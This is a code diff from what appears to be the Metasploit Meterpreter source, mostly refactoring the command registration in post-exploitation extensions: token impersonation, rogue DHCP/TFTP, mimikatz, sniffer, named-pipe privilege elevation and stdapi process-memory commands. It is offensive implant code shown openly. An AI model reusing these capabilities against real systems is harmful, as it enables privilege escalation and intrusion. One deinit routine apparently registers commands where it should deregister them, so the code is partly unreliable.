CloseHandle(hToken);
return FALSE;
}
BOOL has_assignprimarytoken_priv(HANDLE hToken)
{
LUID luid;
LPVOID TokenPrivilegesInfo[BUF_SIZE];
DWORD returned_privileges_length, returned_name_length, i;
char privilege_name[BUF_SIZE];
if(!LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid))
goto exit;
if (GetTokenInformation(hToken, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
for (i=0;i<((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount;i++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[i].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
return TRUE;
}
}
exit:
if(hToken)
CloseHandle(hToken);
return FALSE;
}

4
c/meterpreter/source/extensions/incognito/token_info.h

@ -5,9 +5,11 @@ BOOL is_delegation_token(HANDLE token);
BOOL is_impersonation_token(HANDLE token);
BOOL is_token(HANDLE token, char *requested_name);
BOOL is_local_system();
BOOL has_impersonate_priv(HANDLE hToken);
BOOL has_assignprimarytoken_priv(HANDLE hToken);
BOOL get_domain_username_from_token(HANDLE token, char *full_name_to_return);
BOOL get_domain_groups_from_token(HANDLE token, char **group_name_array[], DWORD *num_groups);
BOOL get_domain_from_token(HANDLE token, char *domain_to_return);
BOOL get_domain_from_token(HANDLE token, char *domainBuffer, DWORD domainBufferSize);
#endif

9
c/meterpreter/source/extensions/incognito/user_management.c

@ -22,6 +22,7 @@ DWORD request_incognito_add_user(Remote *remote, Packet *packet)
HANDLE saved_token;
char *dc_netbios_name, *username, *password, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], password_u[BUF_SIZE];
TOKEN_PRIVS token_privs;
// Read arguments
Packet *response = packet_create_response(packet);
@ -45,7 +46,7 @@ DWORD request_incognito_add_user(Remote *remote, Packet *packet)
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
@ -122,6 +123,7 @@ DWORD request_incognito_add_group_user(Remote *remote, Packet *packet)
HANDLE saved_token;
wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], groupname_u[BUF_SIZE];
char *dc_netbios_name, *groupname, *username, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
TOKEN_PRIVS token_privs;
// Read arguments
Packet *response = packet_create_response(packet);
@ -137,7 +139,7 @@ DWORD request_incognito_add_group_user(Remote *remote, Packet *packet)
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
@ -218,6 +220,7 @@ DWORD request_incognito_add_localgroup_user(Remote *remote, Packet *packet)
HANDLE saved_token;
wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], groupname_u[BUF_SIZE];
char *dc_netbios_name, *groupname, *username, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
TOKEN_PRIVS token_privs;
// Read arguments
Packet *response = packet_create_response(packet);
@ -235,7 +238,7 @@ DWORD request_incognito_add_localgroup_user(Remote *remote, Packet *packet)
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());

89
c/meterpreter/source/extensions/lanattacks/lanattacks.c

@ -142,65 +142,16 @@ DWORD request_lanattacks_stop_tftp(Remote *remote, Packet *packet){
}
Command customCommands[] =
{
// Launch DHCP server
{ "lanattacks_start_dhcp",
{ request_lanattacks_start_dhcp, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Reset DHCP
{ "lanattacks_reset_dhcp",
{ request_lanattacks_reset_dhcp, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Set DHCP Option
{ "lanattacks_set_dhcp_option",
{ request_lanattacks_set_dhcp_option, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Stop DHCP
{ "lanattacks_stop_dhcp",
{ request_lanattacks_stop_dhcp, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Get DHCP Log
{ "lanattacks_dhcp_log",
{ request_lanattacks_dhcp_log, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Launch TFTP server
{ "lanattacks_start_tftp",
{ request_lanattacks_start_tftp, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Reset TFTP
{ "lanattacks_reset_tftp",
{ request_lanattacks_stop_tftp, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Add TFTP file
{ "lanattacks_add_tftp_file",
{ request_lanattacks_add_tftp_file, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Stop TFTP
{ "lanattacks_stop_tftp",
{ request_lanattacks_stop_tftp, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "lanattacks_start_dhcp", request_lanattacks_start_dhcp ),
COMMAND_REQ( "lanattacks_reset_dhcp", request_lanattacks_reset_dhcp ),
COMMAND_REQ( "lanattacks_set_dhcp_option", request_lanattacks_set_dhcp_option ),
COMMAND_REQ( "lanattacks_stop_dhcp", request_lanattacks_stop_dhcp ),
COMMAND_REQ( "lanattacks_dhcp_log", request_lanattacks_dhcp_log ),
COMMAND_REQ( "lanattacks_start_tftp", request_lanattacks_start_tftp ),
COMMAND_REQ( "lanattacks_reset_tftp", request_lanattacks_stop_tftp ),
COMMAND_REQ( "lanattacks_add_tftp_file", request_lanattacks_add_tftp_file ),
COMMAND_REQ( "lanattacks_stop_tftp", request_lanattacks_stop_tftp ),
COMMAND_TERMINATOR
};
/*
@ -211,13 +162,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote){
hMetSrv = remote->hMetSrv;
for (index = 0; customCommands[index].method; index++)
{
dprintf("Registering command index %d", index);
dprintf(" Command: %s", customCommands[index].method);
dprintf(" Register: 0x%.8x", command_register);
command_register(&customCommands[index]);
}
command_register_all( customCommands );
dhcpserver = createDHCPServer();
tftpserver = createTFTPServer();
@ -235,15 +180,13 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
destroyDHCPServer(dhcpserver);
dhcpserver = NULL;
destroyTFTPServer(tftpserver);
tftpserver = NULL;
destroyDHCPServer(dhcpserver);
dhcpserver = NULL;
command_deregister_all( customCommands );
return ERROR_SUCCESS;
}

23
c/meterpreter/source/extensions/mimikatz/main.cpp

@ -88,15 +88,8 @@ DWORD request_custom_command(Remote *remote, Packet *packet)
Command customCommands[] =
{
{ "mimikatz_custom_command",
{ request_custom_command, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "mimikatz_custom_command", request_custom_command ),
COMMAND_TERMINATOR
};
/*
@ -108,10 +101,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
hMetSrv = remote->hMetSrv;
for (index = 0;
customCommands[index].method;
index++)
command_register(&customCommands[index]);
command_register_all( customCommands );
return ERROR_SUCCESS;
}
@ -121,12 +111,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
command_deregister_all( customCommands );
return ERROR_SUCCESS;
}

2
c/meterpreter/source/extensions/networkpug/networkpug.c

@ -324,7 +324,7 @@ DWORD request_networkpug_start(Remote *remote, Packet *packet)
np->remote = remote;
np->pcap = pcap_open_live(interface, MAX_MTU, 1, 1000, errbuf);
// xxx, add in filter support
np->thread = thread_create((THREADFUNK) networkpug_thread, np, remote);
np->thread = thread_create((THREADFUNK) networkpug_thread, np, remote, NULL);
chops.native.context = np;
chops.native.write = networkpug_channel_write;

4
c/meterpreter/source/extensions/priv/server/elevate/namedpipe.c

@ -120,7 +120,7 @@ DWORD elevate_via_service_namedpipe( Remote * remote, Packet * packet )
_snprintf_s( cServiceArgs, sizeof(cServiceArgs), MAX_PATH, "cmd.exe /c echo %s > %s", cpServiceName, cServicePipe );
pThread = thread_create( elevate_namedpipe_thread, &cServicePipe, remote );
pThread = thread_create( elevate_namedpipe_thread, &cServicePipe, remote, NULL );
if( !pThread )
BREAK_WITH_ERROR( "[ELEVATE] elevate_via_service_namedpipe. thread_create failed", ERROR_INVALID_HANDLE );
@ -224,7 +224,7 @@ DWORD elevate_via_service_namedpipe2( Remote * remote, Packet * packet )
if( dwTotal != dwServiceLength )
BREAK_WITH_ERROR( "[ELEVATE] elevate_via_service_namedpipe2. WriteFile hServiceFile failed", ERROR_BAD_LENGTH );
pThread = thread_create( elevate_namedpipe_thread, &cServicePipe, remote );
pThread = thread_create( elevate_namedpipe_thread, &cServicePipe, remote, NULL );
if( !pThread )
BREAK_WITH_ERROR( "[ELEVATE] elevate_via_service_namedpipe2. thread_create failed", ERROR_INVALID_HANDLE );

16
c/meterpreter/source/extensions/sniffer/sniffer.c

@ -675,7 +675,7 @@ DWORD request_sniffer_capture_start(Remote *remote, Packet *packet) {
dprintf("filter applied successfully");
}
j->thread = thread_create((THREADFUNK) sniffer_thread, j, NULL);
j->thread = thread_create((THREADFUNK) sniffer_thread, j, NULL, NULL);
if(! j->thread) {
pcap_close(j->pcap);
break;
@ -1108,12 +1108,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
#endif
dprintf("[SERVER] Registering command handlers...");
for (index = 0; customCommands[index].method; index++) {
dprintf("Registering command index %d", index);
dprintf(" Command: %s", customCommands[index].method);
dprintf(" Register: 0x%.8x", command_register);
command_register(&customCommands[index]);
}
command_register_all( customCommands );
dprintf("[SERVER] Memory reset of open_captures...");
memset(open_captures, 0, sizeof(open_captures));
@ -1178,12 +1173,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
command_register_all( customCommands );
#ifdef _WIN32
MgrDestroy(hMgr);

5
c/meterpreter/source/extensions/stdapi/server/fs/fs_util.c

@ -35,8 +35,9 @@ LPSTR fs_expand_path(LPCSTR regular)
return expandedFilePath;
#else /* Hack to make it work with existing code under *nix */
char *expandedFilePath;
expandedFilePath = malloc(strlen(regular)+1);
strcpy(expandedFilePath, regular);
DWORD expandedFilePathSize = strlen(regular)+1;
expandedFilePath = malloc(expandedFilePathSize);
strncpy(expandedFilePath, regular, expandedFilePathSize - 1);
return expandedFilePath;
#endif
}

44
c/meterpreter/source/extensions/stdapi/server/net/config/netstat.c

@ -261,13 +261,13 @@ DWORD windows_get_tcp_table(struct connection_table **table_connection)
state = currentv4->dwState;
if ((state <= 0) || (state > 12))
state = 13; // points to UNKNOWN in the state array
strncpy(current_connection->state, tcp_connection_states[state], sizeof(current_connection->state));
strncpy(current_connection->protocol, "tcp", sizeof(current_connection->protocol));
strncpy((char*)current_connection->state, tcp_connection_states[state], sizeof(current_connection->state) - 1);
strncpy((char*)current_connection->protocol, "tcp", sizeof(current_connection->protocol) - 1);
// force program_name to "-" and try to get real name through GetOwnerModuleFromXXXEntry
strncpy(current_connection->program_name, "-", sizeof(current_connection->program_name));
strncpy((char*)current_connection->program_name, "-", sizeof(current_connection->program_name) - 1);
set_process_name(currentv4->dwOwningPid, current_connection->program_name, sizeof(current_connection->program_name));
set_process_name(currentv4->dwOwningPid, (char*)current_connection->program_name, sizeof(current_connection->program_name) - 1);
(*table_connection)->entries++;
}
@ -307,13 +307,13 @@ DWORD windows_get_tcp_table(struct connection_table **table_connection)
state = currentv6->dwState;
if ((state <= 0) || (state > 12))
state = 13; // points to UNKNOWN in the state array
strncpy(current_connection->state, tcp_connection_states[state], sizeof(current_connection->state));
strncpy(current_connection->protocol, "tcp6", sizeof(current_connection->protocol));
strncpy((char*)current_connection->state, tcp_connection_states[state], sizeof(current_connection->state) - 1);
strncpy((char*)current_connection->protocol, "tcp6", sizeof(current_connection->protocol) - 1);
// force program_name to "-" and try to get real name through GetOwnerModuleFromXXXEntry
strncpy(current_connection->program_name, "-", sizeof(current_connection->program_name));
strncpy((char*)current_connection->program_name, "-", sizeof(current_connection->program_name) - 1);
set_process_name(currentv6->dwOwningPid, current_connection->program_name, sizeof(current_connection->program_name));
set_process_name(currentv6->dwOwningPid, (char*)current_connection->program_name, sizeof(current_connection->program_name));
(*table_connection)->entries++;
}
@ -373,11 +373,11 @@ DWORD windows_get_udp_table_win2000_down(struct connection_table **table_connect
current_connection->remote_port = 0;
// force state to ""
strncpy(current_connection->state, "", sizeof(current_connection->state));
strncpy(current_connection->protocol, "udp", sizeof(current_connection->protocol));
strncpy((char*)current_connection->state, "", sizeof(current_connection->state) - 1);
strncpy((char*)current_connection->protocol, "udp", sizeof(current_connection->protocol) - 1);
// force program_name to "-"
strncpy(current_connection->program_name, "-", sizeof(current_connection->program_name));
strncpy((char*)current_connection->program_name, "-", sizeof(current_connection->program_name) - 1);
(*table_connection)->entries++;
}
@ -435,13 +435,13 @@ DWORD windows_get_udp_table(struct connection_table **table_connection)
current_connection->local_port = ntohs((u_short)(currentv4->dwLocalPort & 0x0000ffff));
current_connection->remote_port = 0;
strncpy(current_connection->state, "", sizeof(current_connection->state));
strncpy(current_connection->protocol, "udp", sizeof(current_connection->protocol));
strncpy((char*)current_connection->state, "", sizeof(current_connection->state) - 1);
strncpy((char*)current_connection->protocol, "udp", sizeof(current_connection->protocol) - 1);
// force program_name to "-" and try to get real name through GetOwnerModuleFromXXXEntry
strncpy(current_connection->program_name, "-", sizeof(current_connection->program_name));
strncpy((char*)current_connection->program_name, "-", sizeof(current_connection->program_name) - 1);
set_process_name(currentv4->dwOwningPid, current_connection->program_name, sizeof(current_connection->program_name));
set_process_name(currentv4->dwOwningPid, (char*)current_connection->program_name, sizeof(current_connection->program_name));
(*table_connection)->entries++;
}
@ -474,13 +474,13 @@ DWORD windows_get_udp_table(struct connection_table **table_connection)
current_connection->local_port = ntohs((u_short)(currentv6->dwLocalPort & 0x0000ffff));
current_connection->remote_port = 0;
strncpy(current_connection->state, "", sizeof(current_connection->state));
strncpy(current_connection->protocol, "udp6", sizeof(current_connection->protocol));
strncpy((char*)current_connection->state, "", sizeof(current_connection->state) - 1);
strncpy((char*)current_connection->protocol, "udp6", sizeof(current_connection->protocol) - 1);
// force program_name to "-" and try to get real name through GetOwnerModuleFromXXXEntry
strncpy(current_connection->program_name, "-", sizeof(current_connection->program_name));
strncpy((char*)current_connection->program_name, "-", sizeof(current_connection->program_name) - 1);
set_process_name(currentv6->dwOwningPid, current_connection->program_name, sizeof(current_connection->program_name));
set_process_name(currentv6->dwOwningPid, (char*)current_connection->program_name, sizeof(current_connection->program_name));
(*table_connection)->entries++;
}
@ -656,15 +656,15 @@ DWORD linux_parse_proc_net_file(char * filename, struct connection_table ** tabl
current_connection->uid = uid;
current_connection->inode = inode;
// protocol such as tcp/tcp6/udp/udp6
strncpy(current_connection->protocol, protocol, sizeof(current_connection->protocol));
strncpy((char*)current_connection->protocol, protocol, sizeof(current_connection->protocol) - 1);
if ((state < 0) && (state > 11))
state = 12; // points to UNKNOWN in the table
// state, number to string : 0x0A --> LISTEN
strncpy(current_connection->state, connection_states[state], sizeof(current_connection->state));
strncpy((char*)current_connection->state, connection_states[state], sizeof(current_connection->state) - 1);
// initialize every program_name to "-", will be changed if we find the good info in /proc
strncpy(current_connection->program_name, "-", sizeof(current_connection->program_name));
strncpy((char*)current_connection->program_name, "-", sizeof(current_connection->program_name) - 1);
(*table_connection)->entries++;
}

86
c/meterpreter/source/extensions/stdapi/server/net/config/proxy_config.c Normal file

@ -0,0 +1,86 @@
#include "precomp.h"
#ifdef _WIN32
typedef struct
{
BOOL fAutoDetect;
LPWSTR lpszAutoConfigUrl;
LPWSTR lpszProxy;
LPWSTR lpszProxyBypass;
} WINHTTP_CURRENT_USER_IE_PROXY_CONFIG;
typedef BOOL (WINAPI * PWINHTTPGETIEPROXYCONFIGFORCURRENTUSER)(
WINHTTP_CURRENT_USER_IE_PROXY_CONFIG *pProxyConfig
);
#endif
/*!
* @brief Get the current Internet Explorer proxy configuration.
* @param remote Pointer to the \c Remote instance making the call.
* @param packet Pointer to the \c Request packet.
* @return Indication of success or failure.
* @remark This function will only get the proxy configuration that is
* available through IE. This also happens to be the same as that
* which Chrome uses, so you get that for free. But other browsers
* such as Firefox, Safari, Opera, etc. which have their own
* settings are not supported by this function.
*/
DWORD request_net_config_get_proxy_config(Remote *remote, Packet *packet)
{
DWORD dwResult = ERROR_NOT_SUPPORTED;
Packet *response = packet_create_response(packet);
#ifdef _WIN32
HMODULE hWinHttp = NULL;
PWINHTTPGETIEPROXYCONFIGFORCURRENTUSER pProxyFun = NULL;
WINHTTP_CURRENT_USER_IE_PROXY_CONFIG proxyConfig;
do
{
if ((hWinHttp = LoadLibraryA("Winhttp.dll")) == NULL) {
dprintf("[PROXY] Unable to load Winhttp.dll");
break;
}
if ((pProxyFun = (PWINHTTPGETIEPROXYCONFIGFORCURRENTUSER)GetProcAddress(hWinHttp, "WinHttpGetIEProxyConfigForCurrentUser")) == NULL) {
dprintf("[PROXY] Unable to find WinHttpGetIEProxyConfigForCurrentUser in Winhttp.dll");
break;
}
if (!pProxyFun(&proxyConfig)) {
BREAK_ON_ERROR("[PROXY] Failed to extract proxy configuration");
break;
}
packet_add_tlv_bool(response, TLV_TYPE_PROXY_CFG_AUTODETECT, proxyConfig.fAutoDetect);
if (proxyConfig.lpszAutoConfigUrl) {
packet_add_tlv_wstring(response, TLV_TYPE_PROXY_CFG_AUTOCONFIGURL, proxyConfig.lpszAutoConfigUrl);
GlobalFree((HGLOBAL)proxyConfig.lpszAutoConfigUrl);
}
if (proxyConfig.lpszProxy) {
packet_add_tlv_wstring(response, TLV_TYPE_PROXY_CFG_PROXY, proxyConfig.lpszProxy);
GlobalFree((HGLOBAL)proxyConfig.lpszProxy);
}
if (proxyConfig.lpszProxyBypass) {
packet_add_tlv_wstring(response, TLV_TYPE_PROXY_CFG_PROXYBYPASS, proxyConfig.lpszProxyBypass);
GlobalFree((HGLOBAL)proxyConfig.lpszProxyBypass);
}
dwResult = ERROR_SUCCESS;
} while(0);
if (hWinHttp != NULL) {
FreeLibrary(hWinHttp);
}
#else
// no support for this on "nix"
#endif
packet_transmit_response(dwResult, remote, response);
return dwResult;
}

2
c/meterpreter/source/extensions/stdapi/server/net/net.h

@ -59,6 +59,8 @@ DWORD request_net_config_get_arp_table(Remote *remote, Packet *packet);
DWORD request_net_config_get_netstat(Remote *remote, Packet *packet);
DWORD request_net_config_get_proxy_config(Remote *remote, Packet *packet);
// Socket
DWORD request_net_socket_tcp_shutdown(Remote *remote, Packet *packet);

523
c/meterpreter/source/extensions/stdapi/server/stdapi.c

@ -21,447 +21,153 @@ extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
Command customCommands[] =
{
// General
{ "core_channel_open",
{ request_general_channel_open, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "core_channel_open", request_general_channel_open ),
#ifdef WIN32
// Railgun
{ "stdapi_railgun_api",
{ request_railgun_api, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_railgun_api_multi",
{ request_railgun_api_multi, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_railgun_memread",
{ request_railgun_memread, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_railgun_memwrite",
{ request_railgun_memwrite, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_railgun_api", request_railgun_api ),
COMMAND_REQ( "stdapi_railgun_api_multi", request_railgun_api_multi ),
COMMAND_REQ( "stdapi_railgun_memread", request_railgun_memread ),
COMMAND_REQ( "stdapi_railgun_memwrite", request_railgun_memwrite ),
#endif
// Fs
{ "stdapi_fs_ls",
{ request_fs_ls, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_getwd",
{ request_fs_getwd, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_chdir",
{ request_fs_chdir, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_mkdir",
{ request_fs_mkdir, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_delete_dir",
{ request_fs_delete_dir, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_delete_file",
{ request_fs_delete_file, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_separator",
{ request_fs_separator, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_stat",
{ request_fs_stat, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_file_expand_path",
{ request_fs_file_expand_path, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_file_move",
{ request_fs_file_move, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_fs_ls", request_fs_ls ),
COMMAND_REQ( "stdapi_fs_getwd", request_fs_getwd ),
COMMAND_REQ( "stdapi_fs_chdir", request_fs_chdir ),
COMMAND_REQ( "stdapi_fs_mkdir", request_fs_mkdir ),
COMMAND_REQ( "stdapi_fs_delete_dir", request_fs_delete_dir ),
COMMAND_REQ( "stdapi_fs_delete_file", request_fs_delete_file ),
COMMAND_REQ( "stdapi_fs_separator", request_fs_separator ),
COMMAND_REQ( "stdapi_fs_stat", request_fs_stat ),
COMMAND_REQ( "stdapi_fs_file_expand_path", request_fs_file_expand_path ),
COMMAND_REQ( "stdapi_fs_file_move", request_fs_file_move ),
COMMAND_REQ( "stdapi_fs_md5", request_fs_md5 ),
COMMAND_REQ( "stdapi_fs_sha1", request_fs_sha1 ),
#ifdef _WIN32
{ "stdapi_fs_search",
{ request_fs_search, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_fs_search", request_fs_search ),
#endif
{ "stdapi_fs_md5",
{ request_fs_md5, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_fs_sha1",
{ request_fs_sha1, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Process
{ "stdapi_sys_process_attach",
{ request_sys_process_attach, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_close",
{ request_sys_process_close, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_execute",
{ request_sys_process_execute, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_kill",
{ request_sys_process_kill, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_get_processes",
{ request_sys_process_get_processes, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_getpid",
{ request_sys_process_getpid, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_get_info",
{ request_sys_process_get_info, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_wait",
{ request_sys_process_wait, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_sys_process_attach", request_sys_process_attach ),
COMMAND_REQ( "stdapi_sys_process_close", request_sys_process_close ),
COMMAND_REQ( "stdapi_sys_process_execute", request_sys_process_execute ),
COMMAND_REQ( "stdapi_sys_process_kill", request_sys_process_kill ),
COMMAND_REQ( "stdapi_sys_process_get_processes", request_sys_process_get_processes ),
COMMAND_REQ( "stdapi_sys_process_getpid", request_sys_process_getpid ),
COMMAND_REQ( "stdapi_sys_process_get_info", request_sys_process_get_info ),
COMMAND_REQ( "stdapi_sys_process_wait", request_sys_process_wait ),
#ifdef _WIN32
// Image
{ "stdapi_sys_process_image_load",
{ request_sys_process_image_load, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_image_get_proc_address",
{ request_sys_process_image_get_proc_address, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_image_unload",
{ request_sys_process_image_unload, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_image_get_images",
{ request_sys_process_image_get_images, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Image
COMMAND_REQ( "stdapi_sys_process_image_load", request_sys_process_image_load ),
COMMAND_REQ( "stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address ),
COMMAND_REQ( "stdapi_sys_process_image_unload", request_sys_process_image_unload ),
COMMAND_REQ( "stdapi_sys_process_image_get_images", request_sys_process_image_get_images ),
// Memory
{ "stdapi_sys_process_memory_allocate",
{ request_sys_process_memory_allocate, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_free",
{ request_sys_process_memory_free, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_read",
{ request_sys_process_memory_read, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_write",
{ request_sys_process_memory_write, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_query",
{ request_sys_process_memory_query, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_protect",
{ request_sys_process_memory_protect, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_lock",
{ request_sys_process_memory_lock, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_memory_unlock",
{ request_sys_process_memory_unlock, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Thread
{ "stdapi_sys_process_thread_open",
{ request_sys_process_thread_open, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_create",
{ request_sys_process_thread_create, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_close",
{ request_sys_process_thread_close, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_get_threads",
{ request_sys_process_thread_get_threads, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_suspend",
{ request_sys_process_thread_suspend, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_resume",
{ request_sys_process_thread_resume, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_terminate",
{ request_sys_process_thread_terminate, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_query_regs",
{ request_sys_process_thread_query_regs, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_process_thread_set_regs",
{ request_sys_process_thread_set_regs, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Memory
COMMAND_REQ( "stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate ),
COMMAND_REQ( "stdapi_sys_process_memory_free", request_sys_process_memory_free ),
COMMAND_REQ( "stdapi_sys_process_memory_read", request_sys_process_memory_read ),
COMMAND_REQ( "stdapi_sys_process_memory_write", request_sys_process_memory_write ),
COMMAND_REQ( "stdapi_sys_process_memory_query", request_sys_process_memory_query ),
COMMAND_REQ( "stdapi_sys_process_memory_protect", request_sys_process_memory_protect ),
COMMAND_REQ( "stdapi_sys_process_memory_lock", request_sys_process_memory_lock ),
COMMAND_REQ( "stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock ),
// Thread
COMMAND_REQ( "stdapi_sys_process_thread_open", request_sys_process_thread_open ),
COMMAND_REQ( "stdapi_sys_process_thread_create", request_sys_process_thread_create ),
COMMAND_REQ( "stdapi_sys_process_thread_close", request_sys_process_thread_close ),
COMMAND_REQ( "stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads ),
COMMAND_REQ( "stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend ),
COMMAND_REQ( "stdapi_sys_process_thread_resume", request_sys_process_thread_resume ),
